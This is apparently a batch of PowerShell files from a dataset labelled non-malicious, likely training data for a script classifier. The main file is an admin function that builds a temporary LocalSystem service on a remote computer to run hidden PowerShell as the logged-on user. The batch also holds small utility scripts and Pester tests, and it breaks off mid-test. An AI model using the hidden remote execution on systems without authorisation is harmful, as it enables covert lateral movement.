MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ # MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkE0MDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCO # HPtgVdz9EW0iPNL/BXqJoqVMf6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6XRomDAiGA8yMDI0MDIxMjA5NTEy # MFoYDzIwMjQwMjEzMDk1MTIwWjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDpdGiY # AgEAMAoCAQACAiQoAgH/MAcCAQACAhMdMAoCBQDpdboYAgEAMDYGCisGAQQBhFkK # BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ # KoZIhvcNAQELBQADggEBAFBU6786O29SkBUT+oC7/QcnVhfTOQW8thjDc0RoRYJi # IURPOkxRO/IlDd9lZ1gfPNdAY+8vH3+K9ym7WfpK4bq08j2b8qVI6mJ7OUU1IqJU # 5VTjQAV8Jr5b3Bgz3d690CgTwLRDvbEI1BzuLBNceLETBDuCJt2p6nl/uQTx6d/S # S8LKg/1eSOSqnPzoEGq3p3e6Z1XpHlKRZFXDZRZE4hGPuPiNN52fssS77WFmUgOW # avk0xpqrCXFxMyalH6UuW4JDP0dGA4FEhbyS4WyDFSxQsPbtm/L1jklRdh7Cjleo # LmIJQJ66NIzqQ/csm5z+skoDulvCfCNz0rm4HQ4W3I0xggQNMIIECQIBATCBkzB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAezgK6SC0JFSgAABAAAB # 7DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE # MC8GCSqGSIb3DQEJBDEiBCB8Uzc4fPM2JbJjWioJ0WPdfGEgxmGB6keiSUXkENsP # +jCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICcJ5vVqfTfIhx21QBBbKyo/ # xciQIXaoMWULejAE1QqDMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHs4CukgtCRUoAAAQAAAewwIgQg4h+tUv2MROVNCuZexIZu9PAu # 3Pw0hH8H/bUoIUNcDuUwDQYJKoZIhvcNAQELBQAEggIALoDkbRMUTSTxm1eSgqKo # MP4nZtZ8ngSX4oTuvx9cBL06T7kIdPBNNmBH+I+h179iNI8Gc1F0qwCIcGH4mSrd # Xin7rfHO0zKMt8yUoCPhw2CjAc1VWaRlneT5lmMaC9qYdOkGGKF0AnVXGbjSWvj0 # rhiW1v7X2CqIc4cEBWWHkSOzu5ln6ci3fRRCt7WI4nBxiSR0JsftSeSs138Np7tF # xImbb8z9uhNyGn82ZlNwU35+e2dBMxXHkZONqJgpYZDuWwW8rS2MfTe6nw2D5aAa # hriRE3zExWMXwl2wGAv70WKEBMSiThSeH2TSxG45ZC7x86sXXLQavUY5v1J4Rjvg # l4orYQoguda64p4PhTofZcG1OCn+iOuUD/ryl2SjTxWAUhscPZQDUILxd+cbTchO # wjwuVtGdm7UEKGz7XvPZfZNd+IPr+NVEheCcBDpgzK/kxpv7SDLapDn4GN6eogma # i5B4egdaf24Mu+5mZf6y15dXMWbFG+OL9gfmYkaQ2uQRIIOgUofkLfR75w4AYdNh # 93XbzmhNt4wG5oAbk2YPQIyJoeTQ7pHa8DtYnVcqUbhXR2Y0HWxdm1vpVv3ZdswY # bBtDzCZP7G5+FhsH9JQBDhJ+UggMq0QBxoOr911FcfwWKcjXCDM2z7VzOcECyEQT # f9qGfb2Kvry36Im0XY2hFP8= # SIG # End signature block
combined_dataset/train/non-malicious/Invoke-RemoteCommand_1.ps1
Invoke-RemoteCommand_1.ps1
<# # Script FileName: func_Invoke-RemoteCommand.ps1 # Current Version: A03 # Description: Run command on a remote computer as the currently logged on user. # Created By: Adam Listek # Version Notes # A01 - Initial Release # A02 - Conversion to Function # A03 - Abstracted to generic purpose #> Function Global:Invoke-RemoteCommand { [CmdletBinding( SupportsShouldProcess=$true, ConfirmImpact="Low" )] # Terminate CmdletBinding Param ( [Parameter( ValueFromPipeline=$true, Position=0)] [String]$computerName = "localhost", [Parameter(Position=1)][String]$inputCode, [Parameter(Position=2)][String]$outputFile = "C:\\Temp\\Output.ps1", [Switch]$passthru ) # Terminate Param Begin { If ($MyInvocation.BoundParameters.Verbose -match $true) { $local:VerbosePreference = "Continue" $local:ErrorActionPreference = "Continue" $local:verbose = $true } Else { $local:VerbosePreference = "SilentlyContinue" $local:ErrorActionPreference = "SilentlyContinue" $local:verbose = $false } # Terminate If - Verbose Parameter Check # Define Internal Functions @@ Function local:Test-AdministratorPrivileges { Write-Verbose "Get user that script context is being run in." $identity = [Security.Principal.WindowsIdentity]::GetCurrent() Write-Verbose "Create a new Security Principal object to retrieve rights." $principal = new-object Security.Principal.WindowsPrincipal $identity Write-Verbose "Retrieve if user is currently in an Administrator role." $result = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) If ($result) { Write-Output $true } Else { Write-Output $false } # Terminate If - Result } # Terminate Function # Verify whether the current user context for the function is an Administrator @@ If (Test-AdministratorPrivileges -Verbose:$verbose) { Write-Verbose "Function is being run as an Administrator." } Else { Write-Host "Current user, {0}, is not an Administrator." ` -F ([Security.Principal.WindowsIdentity]::GetCurrent()) ` -ForegroundColor Red Break } # Terminate Test for Administrative Privileges # Global Variables $servicePath = "C:\\Temp" $serviceName = "ps_service" } # Terminate Begin Process { # Required if running in Powershell ISE, will set for the shell also. If ($MyInvocation.BoundParameters.Debug -match $true) { # Must be set per pipeline run $local:DebugPreference = "Continue" } Else { $local:DebugPreference = "SilentlyContinue" } # Terminate If - Debug $scriptblock = { Param( $inputCode, $outputFile, $servicePath, $serviceName ) # Parse the results of the current sessions using the built-in executable, Query.exe. $results = c:\\windows\\system32\\query.exe session # Create object array of Query results $active = $results | %{ $line = $_.ToString().Split(" ") $array = $line | Where { $_ -ne "" } Switch ($array.count) { 3 { $sessionname = $array[0] $username = $null $id = $array[1] $state = $array[2] $type = $null Break } 4 { $sessionname = $array[0] $username = $array[1] $id = $array[2] $state = $array[3] $type = $null Break } 5 { $sessionname = $array[0] $username = $array[1] $id = $array[2] $state = $array[3] $type = $array[4] Break } } # Terminate Switch $object = New-Object PSObject -Property @{ sessionname = $sessionname username = $username ID = $id state = $state type = $type } Write-Output $object } | Where { $_.State -eq "Active" } If ($active) { # The data is the local Powershell script that you want to run on the remote system # Using a HereString @'' (does not parse variables within), @"" (will parse variables) Write-Verbose $outputFile Write-Verbose $inputCode # Generate the script file on the fly on the remote computer Out-File -FilePath $outputFile -InputObject $inputCode -Encoding ascii # We want to hide the powershell window and override the execution policy to make sure it runs $command = "powershell.exe -NonInteractive -WindowStyle hidden -NoLogo -File $outputFile -ExecutionPolicy RemoteSigned" $serviceDisplayName = "PS Emulate Session" Write-Verbose $command Write-Verbose $serviceDisplayName # The code to actually generate the service $source = @" using System; using System.Text; using System.Runtime.InteropServices; using System.ServiceProcess; using System.Diagnostics; namespace PS { public class Emulate : System.ServiceProcess.ServiceBase { public Emulate() { this.ServiceName = "$serviceDisplayName"; } static void Main(string[] args) { System.ServiceProcess.ServiceBase.Run(new Emulate()); } protected override void OnStart(string[] args) { base.OnStart(args); EmulateSession.StartProcessInSession($($active.Id), @"$command"); } protected override void OnStop() { base.OnStop(); } public static void WriteToEventLog(string message) { string cs = "PS_Emulate_Service"; EventLog elog = new EventLog(); if (!EventLog.SourceExists(cs)) { EventLog.CreateEventSource(cs, "Application"); } elog.Source = cs; elog.EnableRaisingEvents = true; EventLog.WriteEntry(cs, message, EventLogEntryType.Information); } } static public class EmulateSession { /* structs, enums, and external functions defined at end of code */ public static System.Diagnostics.Process StartProcessInSession(int sessionID, String commandLine) { Emulate.WriteToEventLog("Inside StartProcessInSession"); Emulate.WriteToEventLog("Session ID: " + sessionID.ToString()); IntPtr userToken; if (WTSQueryUserToken(sessionID, out userToken)) { //note that WTSQueryUserToken only works when in context of local system account with SE_TCB_NAME IntPtr lpEnvironment; Emulate.WriteToEventLog("Token: " + userToken.ToString()); if (CreateEnvironmentBlock(out lpEnvironment, userToken, false)) { Emulate.WriteToEventLog("User Env: " + lpEnvironment.ToString()); StartupInfo si = new StartupInfo(); si.cb = Marshal.SizeOf(si); si.lpDesktop = "winsta0\\\\default"; si.dwFlags = STARTF.STARTF_USESHOWWINDOW; // Using the SW_HIDE will make the window hidden, see in the bottom section for more commands si.wShowWindow = ShowWindow.SW_HIDE; ProcessInformation pi; // Note the CreationFlags, they make this work as it must have both the CREATE_NEW_CONSOLE and CREATE_UNICODE_ENVIRONMENT if (CreateProcessAsUser(userToken, null, new StringBuilder(commandLine), IntPtr.Zero, IntPtr.Zero, false, CreationFlags.CREATE_NEW_CONSOLE | CreationFlags.CREATE_UNICODE_ENVIRONMENT, lpEnvironment, null, ref si, out pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); //context.Undo(); try { return System.Diagnostics.Process.GetProcessById(pi.dwProcessId); } catch (ArgumentException) { // I had to remove the ArgumentException e (I removed the e), it threw up a compiler warning //The process ID couldn't be found - which is what always happens because it has closed return null; } } else { Emulate.WriteToEventLog("Could Not Create Process."); int err = Marshal.GetLastWin32Error(); throw new System.ComponentModel.Win32Exception(err, "Could not create process.\\nWin32 error: " + err.ToString()); } } else { Emulate.WriteToEventLog("Could not create environment block."); int err = Marshal.GetLastWin32Error(); throw new System.ComponentModel.Win32Exception(err, "Could not create environment block.\\nWin32 error: " + err.ToString()); } } else { Emulate.WriteToEventLog("No Token"); int err = System.Runtime.InteropServices.Marshal.GetLastWin32Error(); if (err == 1008) return null; //There is no token throw new System.ComponentModel.Win32Exception(err, "Could not get the user token from session " + sessionID.ToString() + " - Error: " + err.ToString()); } } [DllImport("wtsapi32.dll", SetLastError = true)] static extern bool WTSQueryUserToken(Int32 sessionId, out IntPtr Token); [DllImport("userenv.dll", SetLastError = true)] static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit); [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] static extern bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, [In] StringBuilder lpCommandLine, IntPtr /*to a SecurityAttributes struct or null*/ lpProcessAttributes, IntPtr /*to a SecurityAttributes struct or null*/ lpThreadAttributes, bool bInheritHandles, CreationFlags creationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref StartupInfo lpStartupInfo, out ProcessInformation lpProcessInformation); [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr hHandle); [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] struct StartupInfo { public Int32 cb; public String lpReserved; public String lpDesktop; public String lpTitle; public Int32 dwX; public Int32 dwY; public Int32 dwXSize; public Int32 dwYSize; public Int32 dwXCountChars; public Int32 dwYCountChars; public Int32 dwFillAttribute; public STARTF dwFlags; public ShowWindow wShowWindow; public Int16 cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [StructLayout(LayoutKind.Sequential)] internal struct ProcessInformation { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; } /// <summary> /// The following process creation flags are used by the CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, and CreateProcessWithTokenW functions. They can be specified in any combination, except as noted. /// </summary> [Flags] enum CreationFlags : int { /// <summary> /// Not specified by MSDN??? /// </summary> NONE = 0, /// <summary> /// The calling thread starts and debugs the new process and all child processes created by the new process. It can receive all related debug events using the WaitForDebugEvent function. /// A process that uses DEBUG_PROCESS becomes the root of a debugging chain. This continues until another process in the chain is created with DEBUG_PROCESS. /// If this flag is combined with DEBUG_ONLY_THIS_PROCESS, the caller debugs only the new process, not any child processes. /// </summary> DEBUG_PROCESS = 0x00000001, /// <summary> /// The calling thread starts and debugs the new process. It can receive all related debug events using the WaitForDebugEvent function. /// </summary> DEBUG_ONLY_THIS_PROCESS = 0x00000002, /// <summary> /// The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called. /// </summary> CREATE_SUSPENDED = 0x00000004, /// <summary> /// For console processes, the new process does not inherit its parent's console (the default). The new process can call the AllocConsole function at a later time to create a console. For more information, see Creation of a Console. /// This value cannot be used with CREATE_NEW_CONSOLE. /// </summary> DETACHED_PROCESS = 0x00000008, /// <summary> /// The new process has a new console, instead of inheriting its parent's console (the default). For more information, see Creation of a Console. /// This flag cannot be used with DETACHED_PROCESS. /// </summary> CREATE_NEW_CONSOLE = 0x00000010, /// <summary> /// The new process is the root process of a new process group. The process group includes all processes that are descendants of this root process. The process identifier of the new process group is the same as the process identifier, which is returned in the lpProcessInformation parameter. Process groups are used by the GenerateConsoleCtrlEvent function to enable sending a CTRL+BREAK signal to a group of console processes. /// If this flag is specified, CTRL+C signals will be disabled for all processes within the new process group. /// This flag is ignored if specified with CREATE_NEW_CONSOLE. /// </summary> CREATE_NEW_PROCESS_GROUP = 0x00000200, /// <summary> /// If this flag is set, the environment block pointed to by lpEnvironment uses Unicode characters. Otherwise, the environment block uses ANSI characters. /// </summary> CREATE_UNICODE_ENVIRONMENT = 0x00000400, /// <summary> /// This flag is valid only when starting a 16-bit Windows-based application. If set, the new process runs in a private Virtual DOS Machine (VDM). By default, all 16-bit Windows-based applications run as threads in a single, shared VDM. The advantage of running separately is that a crash only terminates the single VDM; any other programs running in distinct VDMs continue to function normally. Also, 16-bit Windows-based applications that are run in separate VDMs have separate input queues. That means that if one application stops responding momentarily, applications in separate VDMs continue to receive input. The disadvantage of running separately is that it takes significantly more memory to do so. You should use this flag only if the user requests that 16-bit applications should run in their own VDM. /// </summary> CREATE_SEPARATE_WOW_VDM = 0x00000800, /// <summary> /// The flag is valid only when starting a 16-bit Windows-based application. If the DefaultSeparateVDM switch in the Windows section of WIN.INI is TRUE, this flag overrides the switch. The new process is run in the shared Virtual DOS Machine. /// </summary> CREATE_SHARED_WOW_VDM = 0x00001000, /// <summary> /// The process is to be run as a protected process. The system restricts access to protected processes and the threads of protected processes. For more information on how processes can interact with protected processes, see Process Security and Access Rights. /// To activate a protected process, the binary must have a special signature. This signature is provided by Microsoft but not currently available for non-Microsoft binaries. There are currently four protected processes: media foundation, audio engine, Windows error reporting, and system. Components that load into these binaries must also be signed. Multimedia companies can leverage the first two protected processes. For more information, see Overview of the Protected Media Path. /// Windows Server 2003 and Windows XP/2000: This value is not supported. /// </summary> CREATE_PROTECTED_PROCESS = 0x00040000, /// <summary> /// The process is created with extended startup information; the lpStartupInfo parameter specifies a STARTUPINFOEX structure. /// Windows Server 2003 and Windows XP/2000: This value is not supported. /// </summary> EXTENDED_STARTUPINFO_PRESENT = 0x00080000, /// <summary> /// The child processes of a process associated with a job are not associated with the job. /// If the calling process is not associated with a job, this constant has no effect. If the calling process is associated with a job, the job must set the JOB_OBJECT_LIMIT_BREAKAWAY_OK limit. /// </summary> CREATE_BREAKAWAY_FROM_JOB = 0x01000000, /// <summary> /// Allows the caller to execute a child process that bypasses the process restrictions that would normally be applied automatically to the process. /// Windows 2000: This value is not supported. /// </summary> CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, /// <summary> /// The new process does not inherit the error mode of the calling process. Instead, the new process gets the default error mode. /// This feature is particularly useful for multi-threaded shell applications that run with hard errors disabled. /// The default behavior is for the new process to inherit the error mode of the caller. Setting this flag changes that default behavior. /// </summary> CREATE_DEFAULT_ERROR_MODE = 0x04000000, /// <summary> /// The process is a console application that is being run without a console window. Therefore, the console handle for the application is not set. /// This flag is ignored if the application is not a console application, or if it is used with either CREATE_NEW_CONSOLE or DETACHED_PROCESS. /// </summary> CREATE_NO_WINDOW = 0x08000000, } [Flags] public enum STARTF : uint { STARTF_USESHOWWINDOW = 0x00000001, STARTF_USESIZE = 0x00000002, STARTF_USEPOSITION = 0x00000004, STARTF_USECOUNTCHARS = 0x00000008, STARTF_USEFILLATTRIBUTE = 0x00000010, STARTF_RUNFULLSCREEN = 0x00000020, // ignored for non-x86 platforms STARTF_FORCEONFEEDBACK = 0x00000040, STARTF_FORCEOFFFEEDBACK = 0x00000080, STARTF_USESTDHANDLES = 0x00000100, } public enum ShowWindow : short { SW_HIDE = 0, SW_SHOWNORMAL = 1, SW_NORMAL = 1, SW_SHOWMINIMIZED = 2, SW_SHOWMAXIMIZED = 3, SW_MAXIMIZE = 3, SW_SHOWNOACTIVATE = 4, SW_SHOW = 5, SW_MINIMIZE = 6, SW_SHOWMINNOACTIVE = 7, SW_SHOWNA = 8, SW_RESTORE = 9, SW_SHOWDEFAULT = 10, SW_FORCEMINIMIZE = 11, SW_MAX = 11 } } } "@ Write-Verbose $source # Using the OutputAssembly and OutputType we can make an executable out of this. It requires the System.ServiceProcess assembly also to inherit the ServiceBase class. Add-Type -TypeDefinition $source -Language CSharpVersion3 -OutputAssembly ("$servicePath$serviceName.exe") -OutputType ConsoleApplication -ReferencedAssemblies "System.ServiceProcess" # Use WMI to create the service, it does not require DesktopInteract # The computer is the localhost cause this code will be run on the remote computer locally. $computer = "." $class = "Win32_Service" $method = "Create" $mc = [wmiclass]"\\\\$computer\\ROOT\\CIMV2:$class" $inparams = $mc.PSBase.GetMethodParameters($method) $inparams.DesktopInteract = $false $inparams.DisplayName = $serviceDisplayName $inparams.ErrorControl = 0 $inparams.LoadOrderGroup = $null $inparams.LoadOrderGroupDependencies = $null $inparams.Name = $serviceDisplayName.Replace(" " ,"_") $inparams.PathName = ("$servicePath$serviceName.exe") $inparams.ServiceDependencies = $null $inparams.ServiceType = 16 $inparams.StartMode = "Automatic" # Will start as localsystem builtin if null $inparams.StartName = $null $inparams.StartPassword = $null $result = $mc.PSBase.InvokeMethod($method,$inparams,$null) Start-Service -DisplayName $serviceDisplayName # Loop until the child process of Powershell.exe is gone. $baseproc = Get-WMIObject Win32_Process | Where { $_.Name -eq $serviceName } While (Get-WMIObject Win32_Process | Where { $_.ParentProcessId -eq $baseproc.ProcessId }) { Sleep 1 } # Terminate While Stop-Service -DisplayName $serviceDisplayName # Use sc.exe to delete the service, if you only use WMI to do this, it will not disappear until next restart, this deletes it immediately C:\\Windows\\System32\\sc.exe delete $serviceDisplayName.Replace(" " ,"_") | Out-Null # Clean up created files Remove-Item -Path ("$servicePath$serviceName.exe") -Force Remove-Item -Path ("$servicePath$serviceName.pdb") -Force Remove-Item -Path $outputFile -Force } Else { Write-Host "No active sessions" } # Terminate If - Active User } # Terminate Scriptblock If (Test-Connection $computerName -Quiet) { Try { Invoke-Command ` -ComputerName $computerName ` -ScriptBlock $scriptblock ` -ArgumentList $inputCode,$outputFile,$servicePath,$serviceName } Catch { Write-Warning "Unable to create remote session: $($_.Exception.Message)" Break } # Terminate Try-Catch } # Terminate If - Test Connection } # Terminate Process <# .SYNOPSIS Invoke remote code impersonating the currently logged on user. .PARAMETER computername Computer to run the remote code on. .PARAMETER inputCode The code to run on the remote computer. .PARAMETER outputFile The output data from a file. .INPUTS The input is a computer. .OUTPUTS The output is the returned data from .EXAMPLE C:\\PS> $code = "Out-File -FilePath c:\\temp\\output.txt -InputObject ([Security.Principal.WindowsIdentity]::GetCurrent())" C:\\PS> Invoke-RemoteCommand -inputCode $code #> } # Terminate Function
combined_dataset/train/non-malicious/Console Function Run.ps1
Console Function Run.ps1
function Run ([String]$scriptName = '-BLANK-') { <# The next function records any running scripts started in the console session (from $pwd) in the Scripts Event Log. It should be placed in the Console $profile. Scripts should be started by typing 'Run example' to capture example.ps1, for example. The default logfile is that used by the Windows Script Monitor Service, available from www.SeaStarDevelopment.Bravehost.com #> if ($host -ne 'ConsoleHost') { return } $logfile = "$env:programfiles\\Sea Star Development\\" + "Script Monitor Service\\ScriptMon.txt" $parms = $myInvocation.Line -replace "run(\\s+)$scriptName(\\s*)" $script = $scriptName -replace "\\.ps1\\b" #Replace from word end only. $script = $script + ".ps1" if (Test-Path $pwd\\$script) { if(!(Test-Path Variable:\\Session.Script.Job)) { Set-Variable Session.Script.Job -value 1 -scope global ` -description "Script counter" } $Job = Get-Variable -name Session.Script.Job $number = $job.Value.ToString().PadLeft(4,'0') $startTime = Get-Date -Format "dd/MM/yyyy HH:mm:ss" $tag = "$startTime [$script] start. --> $($myInvocation.Line)" if (Test-Path $logfile) { $tag | Out-File $logfile -encoding 'Default' -Append } Write-EventLog -Logname Scripts -Source Monitor -EntryType Information -EventID 2 -Category 002 -Message "Script Job: $script (PS$number) started." Invoke-Expression -command "$pwd\\$script $parms" $endTime = Get-Date -Format "dd/MM/yyyy HH:mm:ss" $tag = "$endTime [$script] ended. --> $($myInvocation.Line)" if (Test-Path $logfile) { $tag | Out-File $logfile -encoding 'Default' -Append } Write-Eventlog -Logname Scripts -Source Monitor -EntryType Information -EventID 1 -Category 001 -Message "Script Job: $script (PS$number) ended." $job.Value += 1 } else { Write-Error "$pwd\\$script does not exist." } }
combined_dataset/train/non-malicious/1560.ps1
1560.ps1
function New-MrScriptModule { [CmdletBinding()] param ( [Parameter(Mandatory)] [string]$Name, [ValidateScript({ If (Test-Path -Path $_ -PathType Container) { $true } else { Throw "'$_' is not a valid directory." } })] [String]$Path, [Parameter(Mandatory)] [string]$Author, [Parameter(Mandatory)] [string]$CompanyName, [Parameter(Mandatory)] [string]$Description, [Parameter(Mandatory)] [string]$PowerShellVersion ) New-Item -Path $Path -Name $Name -ItemType Directory | Out-Null Out-File -FilePath "$Path\$Name\$Name.psm1" -Encoding utf8 Add-Content -Path "$Path\$Name\$Name.psm1" -Value ' Get-ChildItem -Path $PSScriptRoot\*.ps1 -Exclude *.tests.ps1, *profile.ps1 | ForEach-Object { . $_.FullName }' New-ModuleManifest -Path "$Path\$Name\$Name.psd1" -RootModule $Name -Author $Author -Description $Description -CompanyName $CompanyName ` -PowerShellVersion $PowerShellVersion -AliasesToExport $null -FunctionsToExport $null -VariablesToExport $null -CmdletsToExport $null }
combined_dataset/train/non-malicious/1909.ps1
1909.ps1
Describe "Group-Object DRT Unit Tests" -Tags "CI" { It "Test for CaseSensitive switch" { $testObject = 'aA', 'aA', 'AA', 'AA' $results = $testObject | Group-Object -CaseSensitive $results.Count | Should -Be 2 $results.Name.Count | Should -Be 2 $results.Group.Count | Should -Be 4 $results.Name | Should -Be aA,AA $results.Group | Should -Be aA,aA,AA,AA ,$results | Should -BeOfType "System.Array" } } Describe "Group-Object" -Tags "CI" { BeforeAll { $testObject = Get-ChildItem } It "Should be called using an object as piped without error with no switches" { {$testObject | Group-Object } | Should -Not -Throw } It "Should be called using the InputObject without error with no other switches" { { Group-Object -InputObject $testObject } | Should -Not -Throw } It "Should return three columns- count, name, and group" { $actual = Group-Object -InputObject $testObject $actual.Count | Should -BeGreaterThan 0 $actual.Name.Count | Should -BeGreaterThan 0 $actual.Group.Count | Should -BeGreaterThan 0 } It "Should use the group alias" { { Group-Object -InputObject $testObject } | Should -Not -Throw } It "Should create a collection when the inputObject parameter is used" { $actualParam = Group-Object -InputObject $testObject $actualParam.Group.Gettype().Name | Should -Be 'Collection`1' } It "Should return object of 'GroupInfo' type" { $actualParam = Group-Object -InputObject $testObject $actualParam | Should -BeOfType "Microsoft.PowerShell.Commands.GroupInfo" } It "Should output an array when piped input is used" { $actual = $testObject | Group-Object ,$actual | Should -BeOfType "System.Array" } It "Should have the same output between the group alias and the group-object cmdlet" { $actualAlias = Group-Object -InputObject $testObject $actualCmdlet = Group-Object -InputObject $testObject $actualAlias.Name[0] | Should -Be $actualCmdlet.Name[0] $actualAlias.Group[0] | Should -Be $actualCmdlet.Group[0] } It "Should be able to use the property switch without error" { { $testObject | Group-Object -Property Attributes } | Should -Not -Throw $actual = $testObject | Group-Object -Property Attributes $actual.Group.Count | Should -BeGreaterThan 0 } It "Should be able to use the property switch on multiple properties without error" { { $testObject | Group-Object -Property Attributes, Length } $actual = $testObject | Group-Object -Property Attributes, Length $actual.Group.Count | Should -BeGreaterThan 0 } It "Should be able to omit members of a group using the NoElement switch without error" { { $testObject | Group-Object -NoElement } | Should -Not -Throw ($testObject | Group-Object -NoElement).Group | Should -BeNullOrEmpty } It "Should be able to output a hashtable datatype" { $actual = $testObject | Group-Object -AsHashTable $actual | Should -Not -BeNullOrEmpty $actual | Should -BeOfType "System.Collections.Hashtable" } It "Should be able to access when output as hash table" { $actual = $testObject | Group-Object -AsHashTable $actual.Keys | Should -Not -BeNullOrEmpty } It "Should throw when attempting to use AsString without AsHashTable" { { $testObject | Group-Object -AsString } | Should -Throw } It "Should not throw error when using AsString when the AsHashTable was added" { { $testObject | Group-Object -AsHashTable -AsString } | Should -Not -Throw } It "Should be able to retrieve objects by key when using -AsHashTable without -AsString" { $testObject = [pscustomobject] @{a="one"; b=2}, [pscustomobject] @{a="two"; b=10} $result = $testObject | Group-Object -AsHashtable -Property a $result.one.b | Should -Be 2 $result["two"].b | Should -Be 10 } It "User's scenario should work (see issue $result = 1..9 | ForEach-Object {[PSCustomObject]@{ErrorMessage = if ($_ % 2) {'SomeError'} else {''}}} | Group-Object -Property {if ($_.ErrorMessage) {'Failed'} else {'Successful'}} -AsHashTable $result['Failed'].ErrorMessage.Count | Should -Be 5 $result['Failed'].ErrorMessage[0] | Should -Be 'SomeError' $result['Successful'].ErrorMessage.Count | Should -Be 4 $result['Successful'].ErrorMessage[0] | Should -Be '' } It "Should understand empty NoteProperty" { $result = "dummy" | Select-Object -Property @{Name = 'X'; Expression = {}} | Group-Object X $result.Count | Should -Be 1 $result[0].Name | Should -Be "" $result[0].Group | Should -Be '@{X=}' } } Describe "Check 'Culture' parameter in order object cmdlets (Group-Object, Sort-Object, Compare-Object)" -Tags "CI" { BeforeAll { $testObject = Get-ChildItem } It "Should accept a culture by name" { if ( (Get-Culture).Name -eq "ru-Ru" ) { $testCulture = "ru-UA" } else { $testCulture = "ru-RU" } {$testObject | Group-Object -Culture $testCulture } | Should -Not -Throw } It "Should accept a culture by hex string LCID" { if ( (Get-Culture).LCID -eq 1049 ) { $testCulture = "0x1000" } else { $testCulture = "0x419" } {$testObject | Group-Object 